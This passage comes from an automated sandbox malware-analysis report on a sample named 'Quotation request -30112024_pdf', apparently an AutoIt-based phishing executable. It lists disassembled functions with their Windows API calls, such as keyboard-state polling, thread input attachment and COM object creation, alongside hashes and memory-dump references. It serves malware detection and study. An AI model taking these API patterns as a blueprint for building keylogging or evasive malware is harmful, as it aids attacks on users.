                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$DriveType
                                                                    • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                                    • API String ID: 2907320926-3566645568
                                                                    • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                    • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                                    • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                    • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                                    Function 00470928 Relevance: 16.7, APIs: 11, Instructions: 166windowtimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                    • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                                    • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                                    • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                                    • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                                    • DeleteObject.GDI32(004E0000), ref: 00470A04
                                                                    • DestroyIcon.USER32(00440054), ref: 00470A1C
                                                                    • DeleteObject.GDI32(675294A6), ref: 00470A34
                                                                    • DestroyWindow.USER32(005C003A), ref: 00470A4C
                                                                    • DestroyIcon.USER32(?), ref: 00470A73
                                                                    • DestroyIcon.USER32(?), ref: 00470A81
                                                                    • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                                    • String ID:
                                                                    • API String ID: 1237572874-0
                                                                    • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                    • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                                    • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                    • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                                    Function 00479362 Relevance: 16.6, APIs: 11, Instructions: 147memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                                    • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                                    • VariantInit.OLEAUT32(?), ref: 004793E1
                                                                    • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                                    • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                                    • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                                    • VariantClear.OLEAUT32(?), ref: 00479489
                                                                    • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                                    • VariantClear.OLEAUT32(?), ref: 004794CA
                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                    • String ID:
                                                                    • API String ID: 2706829360-0
                                                                    • Opcode ID: 23f20de2412018a08f4578d4e0f12eac70a18aacfa0f9406534bc12fd33cd3b0
                                                                    • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                                    • Opcode Fuzzy Hash: 23f20de2412018a08f4578d4e0f12eac70a18aacfa0f9406534bc12fd33cd3b0
                                                                    • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                                    Function 004447E0 Relevance: 16.6, APIs: 11, Instructions: 130keyboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?), ref: 0044480E
                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                                    • GetKeyState.USER32(000000A0), ref: 004448AA
                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                                    • GetKeyState.USER32(000000A1), ref: 004448D9
                                                                    • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                                    • GetKeyState.USER32(00000011), ref: 00444903
                                                                    • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                                    • GetKeyState.USER32(00000012), ref: 0044492D
                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                                    • GetKeyState.USER32(0000005B), ref: 00444958
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: State$Async$Keyboard
                                                                    • String ID:
                                                                    • API String ID: 541375521-0
                                                                    • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                    • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                                    • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                    • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                                    Function 00470B6C Relevance: 16.6, APIs: 11, Instructions: 125COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                    • String ID:
                                                                    • API String ID: 3413494760-0
                                                                    • Opcode ID: f5e40c8b900fee1b1836114e96baa7676a5d0ea0456728bbb6ba58b9775705ba
                                                                    • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                                    • Opcode Fuzzy Hash: f5e40c8b900fee1b1836114e96baa7676a5d0ea0456728bbb6ba58b9775705ba
                                                                    • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                                    Function 004542ED Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 271libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc_free_malloc$_strcat_strlen
                                                                    • String ID: AU3_FreeVar
                                                                    • API String ID: 2634073740-771828931
                                                                    • Opcode ID: 7469b796c24323d6f3eda0c3f5c0d0c50cf0738e1869aab7cbc683baa6804d19
                                                                    • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                                    • Opcode Fuzzy Hash: 7469b796c24323d6f3eda0c3f5c0d0c50cf0738e1869aab7cbc683baa6804d19
                                                                    • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                                    Function 0046C5FA Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 208comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CoInitialize.OLE32 ref: 0046C63A
                                                                    • CoUninitialize.OLE32 ref: 0046C645
                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                      • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                                      • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                                    • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                                    • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                                    • IIDFromString.OLE32(?,?), ref: 0046C705
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                    • API String ID: 2294789929-1287834457
                                                                    • Opcode ID: 0c20d40775bfce32cf04661d64601a772ae0601135a746145f676a0c56776114
                                                                    • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                                    • Opcode Fuzzy Hash: 0c20d40775bfce32cf04661d64601a772ae0601135a746145f676a0c56776114
                                                                    • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                                    Function 004710F1 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                                      • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                                      • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                                      • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                                    • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                                    • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                                    • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                                    • ReleaseCapture.USER32 ref: 0047116F
                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                    • API String ID: 2483343779-2107944366
                                                                    • Opcode ID: 862218e56057e4c31be0f3cfe2a72976207c2cce32986d51b358be60c196e1fc
                                                                    • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                                    • Opcode Fuzzy Hash: 862218e56057e4c31be0f3cfe2a72976207c2cce32986d51b358be60c196e1fc
                                                                    • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                                    Function 004505F0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 147windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                                    • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                                    • _wcslen.LIBCMT ref: 00450720
                                                                    • _wcscat.LIBCMT ref: 00450733
                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                                    • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window_wcscat_wcslen
                                                                    • String ID: -----$SysListView32
                                                                    • API String ID: 4008455318-3975388722
                                                                    • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                    • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                                    • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                    • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                                    Function 00469BF3 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                    • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                                    • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                                    • GetParent.USER32 ref: 00469C98
                                                                    • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                                    • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                                    • GetParent.USER32 ref: 00469CBC
                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 2360848162-1403004172
                                                                    • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                    • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                                    • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                    • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                                    Function 0045DC4C Relevance: 15.2, APIs: 10, Instructions: 190COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                                    • String ID:
                                                                    • API String ID: 262282135-0
                                                                    • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                    • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                                    • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                    • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                                    Function 00448123 Relevance: 15.2, APIs: 10, Instructions: 187windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                                    • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                                    • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                                    • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                                    • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                                    • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$LongWindow
                                                                    • String ID:
                                                                    • API String ID: 312131281-0
                                                                    • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                    • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                                    • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                    • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                                    Function 00434621 Relevance: 15.1, APIs: 10, Instructions: 98threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                                    • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                    • String ID:
                                                                    • API String ID: 2156557900-0
                                                                    • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                    • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
